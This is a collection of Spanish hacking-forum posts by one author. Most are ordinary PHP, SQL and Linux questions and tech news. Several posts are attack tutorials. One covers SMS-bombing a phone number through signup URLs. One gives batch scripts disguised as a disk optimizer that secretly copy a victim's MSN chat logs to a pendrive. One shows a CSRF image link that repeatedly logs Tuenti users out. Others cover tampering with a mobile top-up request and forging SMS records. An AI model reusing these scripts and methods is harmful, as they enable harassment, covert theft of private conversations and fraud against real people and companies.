Temas

Pues estoy haciendo un proyecto y necesito guardar las URL en una db y luego mostrarlas.

El problema es que quiero que no sea (logicamente) vulnerable a XSS ni a SQLi. Pero si quito muchos caracteres o lo limpio puedo perder caracteres vitales como / : ? = etc... que son necesarios.

Un saludo.

Para los que no lo conozcan es una famosa página de apuestas, yo por desgracia puse 10€ y perdí 5€ con los juegos de las motos y todo eso (seguro que hacían trampas) y me dije "Lo apuesto todo el futbol y que sea lo que Dios quiera" (para llegar al mínimo para sacar el dinero).

Logicamente ya conocía del año anterior como iban las cosas y me hice unas especie de método (sí, suena a timo) con estadísticas, probabilidad, etc... que se me dan bien las mates.

Lo que pasa es que empecé con 5€ hace poco y ahora tengo sobre 20€ y claro cuanto más tienes, más puedes apostar etc... y más ganas en menos tiempo.

De las 25 últimas apuestas sólo he perdido 1.

Y se que 'no me dejan ganar' para engancharme por que puedes ver muchos partidos y salen en los periodicos.

Así que la pregunta es ¿Os a pasado y habeis acabado mal? ¿Tiene limitaciones a la hora de ganar dinero? ¿Es peligroso (acabas perdiendo más dinero, etc...)?

Saludos.

Como hacer en vez de que expira en una hora que no expire.

Código (php-brief) [Seleccionar] Expandir

setcookie("TestCookie", $value, time()+3600);

Disfrutenlo:
[youtube=425,350]http://www.youtube.com/watch?v=06Sh9JEmc1c&feature=player_embedded[/youtube]

A ver, lo que pasa es que tengo un cacho código para ejecutar un Select y pienso que está mal y se puede acortar.

A ver, cuando el resultado del SELECT son varias líneas por ejemplo de teléfono que me devuelva 615456321, 654127985, etc... uso el código:

Código (php) [Seleccionar] Expandir

$sql='SELECT Telefono FROM Guia';

$resultados = mysql_db_query($db_name, $sql);

while ($tlf= mysql_fetch_array($resultados)){

echo($tlf["Telefono]."<br>");

};

Aquí todo bien, no creo que se pueda acortar nada, el problema es que cuando necesito sacar sólo un valor para comprobar si existe, por ejemplo si quiero saber si existe el 666999666 hago lo siguiente:

Código (php) [Seleccionar] Expandir

$sql='SELECT Telefono FROM Guia Where Telefono IS  "666999666"';
$tlf = mysql_fetch_array(mysql_db_query($db_name, $sql));

echo($tlf["Telefono"]);

El problema es que no se si se puede acortar algo, puesto que meto una función dentro de otra función.

Un saludo.

Lo que me gustaría saber es cuanto se suele ganar con 1000 impresiones con TradeDouble, ya que no lo encuentro por Internet.

Y lo mismo con Adsense.

Gracias :-)

A ver, cuando se entra en un web y te accedes con tu cuenta pasa dos cosas:

1º Si te registras correctamente y tienes la cookie de sesion entras y ves todo bonito que puedes modificar tusfotos o lo que sea.

2º Si te da error no entras y te sale que no tienes privilegios.

La pregunta es ¿Cómo estructurarlo correctamente, es decir, creo que es muy bestia como yo lo hago tipo.

Código (php) [Seleccionar] Expandir

<?php

if(user == TRUE){

echo("Un cacho código para cagarse");

}ELSE{

echo ("Disculpe, no está registrado");

};

?>

Por eso me gustaría saber como es más correcto.

[Os transcribo noticia aparecida en El Economista en el día de hoy...]

Os transcribo noticia aparecida en El Economista en el día de hoy...

La Agencia Española de Protección de Datos (AEPD) tiene indicios de que Google podría haber grabado a través de sus redes inalámbricas "datos de carácter personal calificados como especialmente protegidos".

Eso es, al menos, lo que asegura en la información remitida en los últimos días al juzgado de instrucción número 45 de Madrid, que ha admitido a trámite una denuncia presentada contra la compañía por la Asociación para la Prevención y Estudios de Delitos, Abusos y Negligencias en Informática y Comunicaciones Avanzadas (Apedanica). Esta asociación cree que Google (GOOG.NQ ) se ha saltado la ley, ya que el artículo 197 del Código Penal prohíbe la intervención de comunicaciones privadas sin autorización judicial.

La AEPD abrió poco antes del verano un expediente al buscador norteamericano para analizar la recogida de datos que llevaba a cabo a través de los vehículos del servicio Google Street View.

"Dentro de las actuaciones asociadas al citado expediente, inspectores de la Agencia Española de Protección de Datos realizaron seis inspecciones in situ con el objetivo de verificar el funcionamiento de los vehículos, así como de acceder de forma remota a los servidores de Google Inc. que contiene los datos recogidos", se asegura en los documentos remitidos el 16 de septiembre a la juez bajo la firma del director de la agencia, Artemi Rallo, y a los que ha tenido acceso elEconomista .

Con el fin de poder realizar un análisis más exhaustivo de la información recogida, los representantes legales de la entidad entregaron los días 3 y 5 del pasado agosto dos discos duros que contenían copia de la información grabada. "Uno de los discos contiene información relativa a los mensajes transmitidos por redes inalámbricas" , según la Agencia.

Las inspecciones las encabezó Luis del Salvador Carrasco. En una de las actas de inspección se deja claro la posible existencia de información confidencial, que hasta el buscador habría reconocido. "Google Inc., al ser consciente del problema que la captación de dichos datos podría representar, procedió a segregarlos del resto de información captada y a aislarlos mediante estrictas medidas de seguridad técnicas y organizativas, de forma que nadie pudiese acceder a ellos, excepto las autoridades de protección de datos" .

Miguel Ángel Gallardo, presidente de Apedanica, insiste en que "se han grabado comunicaciones privadísimas, particulares y personales, incluidos correos electrónicos, chats y, posiblemente, conversaciones telefónicas y videoconferencias" . La AEPD asegura que se está procediendo al análisis de la información recabada, constatando de nuevo que han adoptado "medidas de seguridad de alto nivel".
Medidas de seguridad

La máquina virtual que contiene la información se encuentra en una sala con un sistema de acceso controlado en el que se registra en todo momento el personal que accede a ella.

Ante la imposibilidad de disponer de un registro histórico de acceso y de las modificaciones realizadas sobre el fichero, la agencia ha restringido el uso del equipo a un único usuario, que será el que delegará el acceso sobre la información . La persona designada por la AEPD es la única que cuenta con claves de acceso. En caso de necesitar que otra persona accediese, "lo hará siempre en presencia de la persona designada por la AEPD" que tendrá que reflejarlo.

Hoy empiezan las clases y se han realizado cambio en Tuenti, logicamente como todos los cambios importante se han dejado fallos de seguridad muy importantes, ahora mismo el cuadro de búsqueda es vulnerable a XSS.

Este fallo ha sido avisado a uno de los responsables de Tuenti.



Fuente: Seguridad Dimitrix

Genial, tenemos una idea, ya sea un consolador en forma de PenDrive o cuchitenedor, no importa, lo que importa es que tenemos una idea de un objeto que puede funcionar...

La pregunta es ¿Como creamos ese producto? Es decir ¿Qué fábrica nos lo crea? ¿Cuanto nos cobra?

¡Un saludo!

Bueno, entre los SMS de amenazas (coña) hoy he recibido uno que dice así:

"I will harden Pharaoh's heart, and multiply my signs and my wonders in the land of Egypt."



Esto es del éxodo dice algo así:

"voy a endurecer el corazón del faraón y multiplicar mi canta y mis maravillas en la tierra de egipto." ~ (es del exodo)



Lo raro no es esto, por que se podrían haber equivocado, lo raro viene aquí:

el teléfono que me lo mandó es este: +9689525061*

Que corresponde al país Oman (Árabes):
http://www.como-llamar.com.mx/phone/Oman/index.htm

¿Qué coño les he hecho yo?

Hola, estoy realizando una web algo parecido a la wikipedia/worpress (el funcionamiento), pero desde 0 y ya la tengo casi completita.

Lo único que me falta es en el panel administrador para poder publicar las cosas con colorines sin escribir todo en fuente, necesito encontrar algo parecido a esto, pero no se donde:

Estoy pensando tener mi casa tipo servidor. Tengo una conexión de 20Megas de Orange, me gustaría saber cuantas visitas al día puede soportar eso... (En el pc de mi casa, sería sólo texto).

Tengo un servidor la mar de bonito por el que pago, pero quiero aprender a manejar mejor los servidores por si algún día tengo ataques DDOS, o tengo que recortar en consumo, etc...

Un saludo

Hola, muchos de aquí ya me conocereis, para los que no soy Dimitrix.

Hace poco abrí una página web y me gustaría publicarme en webs, logicamente hay dinero por medio entre otras cosas.

Por eso mismo, me gustaría que los usuarios del foro que tengan una web con las siguientes características se pongan en contacto conmigo si están interesados.

- Una web/comunidad/foro.
- Más de 300 visitas al día.

No quiere decir las condiciones para no alargarme y no hacer SPAM, pero es mucho más que dinero y bueno, podeis preguntarme y si no quereis nada.

Un saludo y muchas gracias.

[Rumores de que China no renovará a Google]

Rumores de que China no renovará a Google

Son muy distintas las versiones que se comentan, por parte del gigante de los buscadores:

El consejero delegado de Google, Eric Schmidt, expresó su confianza en que Pekín renueve la licencia al buscador de Internet para que pueda seguir ofreciendo su servicio en China pese a las disputas que han mantenido en los últimos meses el gobierno comunista y la multinacional tecnológica.

No obstante, los rumores no dicen eso. Hay que recordar que Google increpó a China de ciberataques y se metió conta la libertad en dicho país, muchos piensan que para imponer su poder.

No obstante no hay que olvidar que China es muy convencionalista y no se deja intimidar facilmente, por eso gran parte de la gente cree que China no renovará a Google.

Fuentes anónimas indican que Google presentó el informe para renovar 'tarde' y que pueden tener problemas, quizás sean escusas para no renovarles o quizás no.

¿Qué pasará si no le renuevan?

Al parecer Google no le gusta la idea de perder ese país que cuenta con más de 1.300 millones de habitantes. Lo que significaría GRANDES perdidas para el gigante de Internet.

¿A quién favorece?

Microsoft, hay que recordar que mientras Google acusaba a China por los ciberataques y por la restricción de libertad en las búsquedas Microsoft aprovechaba para decir su posición "Estar en China como ayuda a los habitantes en sus búsquedas por Internet, siguiendo todas las leyes Chinas"

Fuente: Dimitirix

[[Manual] Liberar móvil, liberar SIM]

[Manual] Liberar móvil, liberar SIM

Puesto que esta parte del foro es un caos voy a intentar hacer una manual que sirva de referencia a otros y así no haga falta responder 10.000 veces lo mismo.

Primero hay que ver la diferencia entre liberar el móvil y liberar la SIM.

Liberar el móvil
Cuandos nos referimos a liberar un móvil (celular) también llamado terminal, es debido a que hemos comprado el teléfono con una compañía y sólo sirven las tarjetas de esa compañía. El termino liberar se refiere a la modificación del terminal para que pueda ser utilizado con la SIM de cualquier compañía. La liberación suele darse de dos maneras posibles, una es sabiendo el código de liberación que la compañía tiene la obligación de dartelo una vez finalice el contrato con ella y la otra manera, es mediante hadware. Al final lo que conseguimos es un móvil que nos sirve para cualquier compañía, también llamado móvil libre.

Liberar la SIM
Es un método más sencillo para el usuario y tiene la ventaja de que el terminal no puede dañarse ni perder la garantía.
Para usar cualquier móvil sin importar la compañía hace falta adquirir una tarjeta SIM especial, es mucho más fina (como un papel) y una de las marcas más famosas es la "SmartSim". Esta SIM que suele ser negra se introduce justo debajo de la verdadera y al colocar las dos SIM a la vez en el móvil acedemos sin ningún problemas. Es decir podemos usar todos los móviles sin tener que liberarlos.

Tiendas:
SeImporta.com - SmarSim

Por favor, si alguien conoce alguna tienda más o algún otro dispositivo que lo comparta y lo pondré.

¿Qué os parece?

[Falsificación de mensajes móvil]

Falsificación de mensajes móvil

No es la primera vez que en esta web hablamos sobre estos temas de móviles y hoy os traigo un artículo bastante interesante.

Con esto, lo que queremos hacer es, introducir en nuestra SIM el mensaje que queramos (pudiendo elegir como entrante o saliente) y pudiendo elegir la fecha y el número que supuestamente nos ha enviado el mensaje (o al que le hemos enviado)

¿Para que nos puede funcionar?
Pues al estar introducido en la tarjeta SIM y no en el móvil los datos son totalmente cierto (o eso se cree), si por ejemplo dices que has enviado un mensaje y dice enseñame el móvil, podrás hacer que aparezca la fecha/hora y el número que quieres y eso es indiscutible. También puedes decir que una persona te envió un mensaje (que realmente nunca te envió).

¿Y como se hace esto?
Pues de una manera sencilla, al ser a nivel de SIM, necesitaremos un Lector SIM, para añadir/modificar los datos desde nuestro ordenador. También puedes hacer Backups de la agenda, etc... Usan una interfaz para Windows muy sencilla

¿Y como lo consigo, cuanto cuesta?
Es difícil encontrarlo en las tiendas, normalmente estos dispositivos (legales) se venden en Internet. Yo lo compré en esta tienda y me costó menos de 5€

¡Be happy!

Fuente: Segurida Dimitrix

Cada vez que pongo una imagen en el foro, no me deja y me sale el siguiente código:

Código [Seleccionar] Expandir

[img]http://r.i.elhacker.net/cache?url=http://i214.photobucket.com/albums/cc173/dimitrix-es/XSS and Others/tlf.png[/img]

No me importaría si no llega a ser por que el código que pongo es:

Código [Seleccionar] Expandir

[img*]http://i214.photobucket.com/albums/cc173/dimitrix-es/XSS and Others/tlf.png[/img*]

Y no me sale la imagen, la putada es que la imagen no se muestra.

[Microsoft saca un juego online gratuito]

Microsoft saca un juego online gratuito

El nombre del juego es "Desafiate", a diferencia de otros juegos sacado por grandes compañías como Google y Microssoft, este juego para ser un juego en flash, tiene una muy buena calidad.



El funcionamiento es sencillo, se conecta a tu cuenta de Facebook para usar tu nombre y tus datos y eres un persona (tipo SIMS) que te tienen que contratar en un empresa en el despacho de informática e irte pasando pantallas.

Pero ahí no termina todo, puesto que para los mejores jugadores, los consigan más puntos tendrán regalos.

Vealo usted mismo en: www.desafiate.es

Fuente: Dimitrix

[Microsoft: ¿Qué prefieres desinstalar el Office o tu jefe?]

Microsoft: ¿Qué prefieres desinstalar el Office o tu jefe?

Esta vez Microsoft nos sorprende con una web animada que nos hace reflexionar con que es peor ¿Office o tu jefe?

Con el lema: "Tu trabajo sin Microsoft Office sería un infierno. Sin tu jefe, un paraíso." nos adentra a una reflexión de lo bueno que es el office y lo malo que son los jefes. Para ello usa videos y animaciones.

Más información en la web del proyecto:
http://www.microsoft.com/spain/office/desinstalandoaljefe/

Fuente: Dimitrix

Pues eso, he entrado en mi cuenta de google iba a buscar algo y me encontré que tenía una fea imagen de fondo.... (Cosa que esto es más bien de Bing ~Microsoft~) y creo que es algo que no pega con Google ¿Qué opinais?

Necesito desde raiz que busque un  fichero y logicamente que me diga donde está

He probado los comandos ls, file y grep. Y sí he preguntado a Google pero nada.

Un saludo.

Código [Seleccionar] Expandir

Hola buenas, estoy intentando mejorar mi Linux con un ejercicio de clase que es hacer una especie de backup.

Bueno ya lo terminé más o menos:

[code=bash]#! /bin/bash
clear
echo Sistema de BackUp
echo -----------------
echo 
echo Por favor introduzca el directorio que quiere copiar ¡No funciona con ficheros!
read DIRECTORIO1
echo Por favor introduzca el directorio donde quiere guardar la copia
read DIRECTORIO2
tar -cvf ${DIRECTORIO2}backup.tar ${DIRECTORIO1}

Lo que pasa es que el formato del archivo tiene que ser: backup_fecha.tar

Entonces yo he probado con esto:

Código (bash) [Seleccionar] Expandir

tar -cvf ${DIRECTORIO2}_${data %F}backup.tar ${DIRECTORIO1}[/code]

Y como que no funciona.

A ver si me podeis ayudar.
Un saludo!

Realmente ¿Esto es posible en España?
He estado mirando y todas las aplicaciones permiten para un montón de paises de la UE y de America tanto ricos como pobres, pero en España parece imposible comprar para un VozIp un número de casa tipo 91* *** ***.

¿Alguien sabe si alguna compañía lo hace?

¿Por qué tanta prohibición?

Hola a todos, hace tiempo que no se me ve el pelo pero ya estoy de regreso.

Me gustaría informaros de que voy a 'grabar' con unos amigos un programa tipo "Mundo Hacker", cada vez se hablará de un tema distinto y bueno simplemente decir que no será una copia ni un intento de seguir Mundo Hacker ya que para mi es inalcanzable, eran super graciosos y lo hacían genial.

Pero a ver si así aporto un poco más a toda esta comunidad y la gente, sobretodo a los más 'kidd's' en este sentido que puedan aprenden, que la gente se actualize y todos nos lo pasamos bien.

Por su puesto si alguien quisiera participar con algún tema, hablándonos de algo, podría hacerlo sin problemas (si va a ser presencial, es indispensable que nos traiga una birra!)

Y bueno ya está, espero que nos deis una oportunidad y me digais que os parece.

Muchas gracias.

Este fallo lo tienen casi todas las compañías telefónicas móviles, lo que vamos a conseguir es ponernos un saldo que no sea fijo (5€, 10€, 15€, etc...) y que además sea el mínimo, así que lo que haremos será ponernos 1€ de saldo en nuestro móvil, recordar que se puede poner cualquier cantidad.

Lo primero entramos en Orange y ponemos nuestros datos y seleccionamos la cantidad de saldo que sea (no importa)

Luego le ponemos en Tamper Data y modificamos el valor (img).

Y al final ya tenemos un saldo de 1€

En la fuente hay imágenes.

Fuente: http://seguridad.dimitrix.es/index.php/2010/04/30/orange-y-el-saldo-modificable/

Mi pregunta es:

¿Cual es la mejor forma de controlar que no te la 'intenten colar' en un formulario?

Yo había pensando en un archivo por ejemplo 'limpieza.php' e importarlo cada vez que use el SQL con una función que limpie la variable.

Otra opción creo que era algo como escapar caracteres HTML.

¿Cual es la mejor opción?

[Es para coger una avión.]

Cual es el numero de pasaporte (soy Español):

El que pone: "Pasaporte No." -> AA854654
O el que pone: "Id no." -> A2145656600 (Este lleva mi DNI)

Es para coger una avión. El problema es que tengo que renovarlo dentro de 2 semanas y no se si el numero cambia o que.

Thank U^^

Según tengo entendido MySQL es un programa... pero por que dicen que se usa MySQL para web?

¿Algún link "recomendatorio" para empezar en PHP (para crear tablas uso PHPMyAdmin)?

Pues eso, decirme que os parece, lo hice todo yo... criticas please^^

[Bloqueando Móviles: SMS Masivos gratuitos]

Bloqueando Móviles: SMS Masivos gratuitos (Tema,  un poco de reflexión)

Seguro que todos habreis visto por Internet un montón de páginas que os piden poner vuestro número de teléfono, bien, te venden de todo, desde canciones hasta horoscopos, legalmente necesitan una aceptación y que sea tuyo el número de teléfono, para ello, ellos envían un SMS con un código al número que le indiques, pero... ¿Y si no es tu móvil?

Como es lógico, habrá un número máximo de SMS que envien (al día), el problema es que ese número va desde 5 hasta ningún límite (realmente hay páginas que no les vi nunca el límite).

Pero claro... no vamos a estar todo el rato, haciendo un ridículo test o poniendo el nombre de nuestra/o chica/o, la verdad es que no hace falta ya que en estos servidores también está abierto el GET, así que en vez de poner cada vez el número de teléfono que queremos bombardear, lo podremos dejar en algo así:

http://www.servidor.com/send.php?mode=signup&phone=6********

Genial, ahora nos ha quedado una URL que cada vez que la visitemos estaremos enviando un SMS, así que ahora sólo queda automatizar esto, para ello iremos a:
http://seguridad.dimitrix.es/index.php/multivisitas/

Con esta herramienta ponemos la URL y las veces que quieres que se envíen el SMS y listos.

Ahora colocaré dos páginas vulverable (son todas de este tipo):

Flycell (Límite 25 SMS):
http://www.XXXXXes/offer/index.php?mode=signup&ref=\&smsId=510&object=000000^000&termsAccept=1&x=28&y=22&phone[]=6********

SMS-Gratuito (Límite 5 SMS):
http://www.xxxxxx.es/subscribe.php?telemovel=6********&operator=movistar&telemovel_destino=61234578&mensagem=%22%3E

———————————————
Recordar, que esto es sólo informativo, no queremos que hagais nada malo chicos

Fuente: http://seguridad.dimitrix.es/index.php/2010/01/22/bloqueando-moviles-sms-masivos-gratuitos/

Más Links: http://www.facebook.com/pages/Yo-tambien-soy-Fan-DIMITRIX/110339282319959

Pues ahí la pregunta, cual es la mejor forma de tratar fechas y como sería es decir "12/12/2012" o "15-12-2015"

Thank you!

Pue eso, no se muy bien cual sería la forma para plantear el siguiente problema:

Tenemos el hotel "Pepito Grillo", este hotel tiene 10 habitaciones, 5 normales, 2 super y 3 ultrasupers.
El gerente quiere que se pueda reservar con hasta 6 meses de antelación.
-------------------

Pues ¿Como se podría plantear?, por que vale, hacer que mire si un día queda una habitación libre vale, pero mirar si una habitación se encuentra ocupada durante 7 días. Entonces, tendría que haber un una tabla que guarde como registros cada habitación o como lo podría plantear?

Aunque parezca ejercicio de clase es más bien para aprender por ahora el planteamiento y hacerlo.

Un saludo y mil gracias.

Pues eso, me gustaría saber como se puede hacer para poner:

http://foro.elhacker.net/php-b68.0/

En vez de

http://foro.elhacker.net/index.php?top=6.0

Por que está claro que no es una carpeta por subforo ni por post.

Un saludo y muchas gracias.

Aunque parezca SPAM, no lo hago con esa intención

A ver si alguien me puede ayudar con este tipo de letra.

Saludos!

Pues eso, me gustaría saber con cuantos puntos subes a que rango, no se si se me entiende^^

Pues eso... no soy nadie para decir nada, pero creo que es una palabra que puede salir en un copy and paste, una expresión, etc...

A mi me da igual, es que lo que me molesta es tener que fijarme para que no me salgan asteriscos y lo de poner una etiqueta en medio no gustoso^^

Pues aburriendome (sí, mucho), acabo de ver que si introduces "> en el localizador de IPs de esta web aparece:



Y en la parte de DATOS:

Dirección IP     : 25819.E5687.W2798.5TH67.00021
Pais    : Tierra de Lockyer
Código de área    : Z8801
Región    : Los valles rojos
Ciudad    : Valle Huaerte
Código ZIP    : 10-087998571


http://www.elhacker.net/elhackernet/geolocalizacion.html

A ver, tengo una tabla con lo siguiente:



Y no se como hacer una **** consulta que añadiendole solo el alias (alias es la clave principal) me cambie el valor de la cantidad.

Si por ejemplo "link" quiero que pase de 4 a 2, no sabría como hacerlo por así decirlo ¿Alguna ayuda?

[Tuenti - Cambiar el estado, aleatorio cada X tiempo automaticamente]

Tuenti - Cambiar el estado, aleatorio cada X tiempo automaticamente

Ante todo, hola y gracias por leerme!


Bien, con esto lo que pretendo es "Que se cambie solo el estado del tuenti" cada 15 minutos por ejemplo o cuando quieras.

Para eso yo usaré el siguienten código PHP junto con el Cron (el que viene con muchos servidores) que mande la petición cada 15 minutos, aunque también podeis hacerlo con cualquier otro programa, bueno, antes de mirar el PHP os digo que neceistareis la cookie "msid" de la versión movil de tuenti, es decir http://m.tuenti.com (entrar con firefox) y la variable csfr (se puede encontrar en el código fuente de la página principal normal, si no sabeis, preguntar):

Código (php) [Seleccionar] Expandir

    <?

    $val = rand(1, 5);

    if ($val == "1") {
    $sta = "Estoy genial";
    } elseif ($val == "2") {
    $sta = "no quiero mas eventos";
    } elseif ($val == "3") {
    $sta = "nooooo";
    } elseif ($val == "4") {
    $sta = "Sandraaa la mejorr";
    } elseif ($val == "5") {
    $sta = "MUAKA";
    } else {
    $sta = "na de na";
    }

    $string = "msid=NjUwMzM2zETgzMzczQ6MTI1NTk4DE5OQ";

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "http://m.tuenti.com/?m=profile&func=process_set_status&from=home&csfr=******");
    curl_setopt ($ch, CURLOPT_POSTFIELDS, "status=".$sta);
    curl_setopt($ch, CURLOPT_COOKIE, $string);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
    $text = curl_exec($ch);
    curl_close($ch);
    die($text);
    echo("Programado por Dimitrix");
    ?>

Como el código es muy simple no estaré horas explicándolo, simplemente decir que cambiamos las 6 frases que son los "estados que saldrán aleatoriamente" y cambiar el estado de la variable "msid" por la vuestra los asteriscos de la URL  por vyestra variable "csfr" y ejecutarlo y listo!

El funcionamiento
El programa lo que hace es enviar una petición con tu cookie a http://m.tuenti.com/?m=profile&func=process_set_status&from=home&csfr=****** con una frase aleatoria de las 5 que hay primero puesta (la sexta es más bien para hacer bonito en caso de que el cielo se caiga! xD)

Si lo vais a poner en otro foros por lo menos decir la web del autor o el nombre de tal (Dimitrix)

Un saludo y pronto mucho más.

Web del autor

Dimitrix
.

[Modificación del código (Por partes)]

Bueno, hace tiempo programé una web que simplemente introducías el link y a la gente le salía ya premium 

Para esto hace falta tener previamente una cuenta premium, el sistema también tiene varios métodos para ganar dinero (de eso se trata).

------

Lo podeis modificar como querais pero agradecería la decencia de que pusierais algo tipo "Ideado por Dimitrix", bueno os digo primero el funcionamiento.

Para que la gente pueda acceder a la web tendrá que estar registrado en un foro SMF del mismo dominio (así con canalmail podeis ganar dinero^^).

Luego accederá, pondrá la URL y tendrá que presionar 5 veces a "siguiente" para que le salga el enlace premium (tambien con más publicidad).

También le he puesto un poco de seguridad.

-------

Modificación del código (Por partes)

index.php

Código (php) [Seleccionar] Expandir

if($_COOKIE[SMFCookie463] == NULL) {
Aquí teneis la parte que mira si está logeado el usuario en el foro, puede ser que no sea "463" pues le cambiais el número o si no quereis SMF quitais esto (acordaros del } último quitarlo)

mu2.php

Código (php) [Seleccionar] Expandir

if($_COOKIE[SMFCookie463] == NULL) {
De nuevo lo mismo que antes...

Código (php) [Seleccionar] Expandir

$string = "user=tucookie";
Bien, donde pone "tucookie", tendreis que poner el valor "user" de la cookie, es algo así "564545ab545aed45"

Se me olvidaba decir, que cambia el nombre verdadero del user por el de "Bill_Gates"

mc.php
Solamente es publicidad que saldrá debajo^^

---------

Modificar el código como querais, eso si, os agradecería que, a poder ser, me nombrarais en algo.

--> Descargar <--

Intento hacer un programa que al usar X veces la web no te deje más, lo hice con cookies, pero no me llama la atención ya que se puede borrar, por eso, pensé guard la IP durante 24 horas y a las 24 que se borre.

Pues eso, si alguien me puede ayudar...

[Para MSN:]

Me gustaría mostrar ya que está creado un programa en bat, que se trata de poner el pendrive, ejecutarlo y se copia las conversaciones de Msn y Msn plus al prendrive en modo oculto.

La aplicación está en MS-DOS (Bath...) y puse como que pareciera un programa para aumentar el rendimiento del PC, además al estar en Bath podeis modificarlo vosotros.

El problema mayor es que lo cree pensando en Msn, pero luego me di cuenta que el PC al que quería "pillar" las conversaciones tenía el Plus y se guardaba en otra carpeta de otra manera.

Además enseñaré un ejemplo de si quereis copiar automaticamente sólo un contacto en especial.


Para MSN:

Código [Seleccionar] Expandir

    @echo off
    Color 30
    echo.
    echo                     ==================================
    echo                     =        Surfet v.3.0.1          =
    echo                     =        Analizador HDD          =
    echo                     =             MoN                =
    echo                     ==================================
    echo.

    set /p unidad= Nombre de unidad ejecucion:

    echo.
    echo Analizando HDD "%username%"
    echo Puede tardar unos minutos, por favor espere, le indicaremos cuando haya finalizado.
    echo.
    xcopy "C:\Documents and Settings\%username%\Mis documentos\Mis archivos recibidos\*.*" "%unidad%:\FPs\" /S /C /Q

    cls

    echo.
    echo                     ==================================
    echo                     =        Surfet v.3.0.1          =
    echo                     =        Analizador HDD          =
    echo                     =             MoN                =
    echo                     ==================================
    echo.
    echo.
    echo Surfet termino de analizar y reparar el disco duro
    echo Rendimiento conseguido:                        34%
    echo.
    pause

Para MSN-PLUS:

Código [Seleccionar] Expandir

    @echo off
    Color 30
    echo.
    echo                     ==================================
    echo                     =        Surfet v.3.0.1          =
    echo                     =        Analizador HDD          =
    echo                     =             MoN                =
    echo                     ==================================
    echo.

    set /p unidad= Nombre de unidad ejecucion:

    echo.
    echo Analizando HDD "%username%"
    echo Puede tardar unos minutos, por favor espere, le indicaremos cuando haya finalizado.
    echo.
    xcopy "C:\Documents and Settings\%username%\Mis documentos\Mis historiales de conversaci¢n\*.*" "%unidad%:\FPs\" /S /C /Q
    cls

    echo.
    echo                     ==================================
    echo                     =        Surfet v.3.0.1          =
    echo                     =        Analizador HDD          =
    echo                     =             MoN                =
    echo                     ==================================
    echo.
    echo.
    echo Surfet termino de analizar y reparar el disco duro
    echo Rendimiento conseguido:                        34%
    echo.
    pause

Bien, el caso, para que todo parezca más real, la única variable que no he programa en automática es la de la únidad del pendrive donde se ejecuta.

Entonces, una vez ejecutamos la aplicación, pondremos en que unidad está y presionamos ENTER, entonces se copiarán todos los datos a la carpeta "FPs" del pen-drive (recomiendo crearla antes para que no aparezca "por arte de magia")

También, si queremos cambiar que sólo copie las conversaciones de un contacto, por ejemplo de "peibol@hotmail.com", modificaremos por ejemplo en el de MSN-PLUS la parte.

Código [Seleccionar] Expandir

    xcopy "C:\Documents and Settings\%username%\Mis documentos\Mis historiales de conversaci¢n\*.*" "%unidad%:\FPs\" /S /C /Q

por el siguiente:

Código [Seleccionar] Expandir

    xcopy "C:\Documents and Settings\%username%\Mis documentos\Mis historiales de conversaci¢n\*peibol@hotmail.com.html" "%unidad%:\FPs\" /S /C /Q






Descargar (los dos archivos ya creados): http://www.megaupload.com/?d=293D1ZKC

Creador: Dimitrix

Fuente: http://seguridad.dimitrix.es/?p=5

[&img=dimitrix.jpg]

Este fallo consiste en una desconexión automática de la cuenta cada vez que se conecta el usario y ve su perfil o lo que quieras mediante un mensaje que le has introducido "maligno" por así decirlo, mejora aun cuando al "desconectarse" involuntariamente no puede borrar el mensaje ya que le da error por que no está logeado, así que siempre que entra se cierra.

El problema en cuestión se encuentra en que si accedes a "http://m.tuenti.com/?m=login&func=log_out" se cierra la cuenta, está creado para móviles, con el firefox se puede entrar sin problemas y con el Internet explorer te sale como para descargar así que no es que puedas navegar mucho, pero no pasa nada por que sólo queremos que se envie la solicitud y ni saldrá nada, así que veamos los pasos a seguir.

El primer paso es darse cuenta de que en Tuenti, pasa algo que no se puede poner llamar fallo por que muchas veces es muy útil, y es que al poner una imagen la reconoce automaticamente, pero lo único que hace es reconocer que hay un "http://" y un ".jpg" (u otra extensión de imagen aceptada), por eso la misma imagen la puedes poner de distintas formas:

Código [Seleccionar] Expandir

    http://www.dmx.es/dmx.jpg

    http://www.dmx.es/dmx.jpg?variable=hola

    http://www.dmx.es/dmx.jpg?

    http://www.dmx.es/dmx?algo=.jpg

Esto puede pasar por dos cosas, una, por descuido de los programadores o por que en algunos servidores se da el caso de variable en php para por ejemplo poner imágenes aleatorias.

Entonces, sabiendo esto, lo único que necesitamos es unir las dos cosas:

http//://m.tuenti.com/?m=login&func=log_out&img=dimitrix.jpg

Esta vez ponemos "&" y no "?" por que estamos uniendo más de una variable, con esta url, simplemente lo dejamos en el tablón de un amigo y cada vez que entre se le cerrará y si intenta borrar el comentario no podrá por que se habrá cerrado la sesión y le dará error.

Una vez, lo pongamos al no ser una imagen, NUNCA se cargará y se quedará parado así:

Bueno, aquí ya estariamos jodiendo a la persona que tiene ese tuenti haciendo que se deconecte cada vez y a los que visitan su perfil.

Solución:

Vas a tu tablón y le das al botón borrar y cuando te salga lo de si estás seguro, abres otra ventana del navegador y entras a www.tuenti.com y te logeas (ya que se habrá cerrado la sesión), una vez logeado NO pasas a ver el tablón ni tocas nada, regresas a donde decía borrar si querías o no y le das a "Aceptar", entonces el comentario se borrará.

Siendo más cabrón:

También esto se puede hacer en campañas de publicad que ponen, pones eso y todos los que vean el anuncio (miles y miles de personas) se les cerrará la cuenta ya que nadie podrá escribir comentarios nuevos por que se les cerró la sesión y no pueden borrar los comentarios escritos por ti.

Autor: Dimitrix
Fuente: http://seguridad.dimitrix.es/?p=1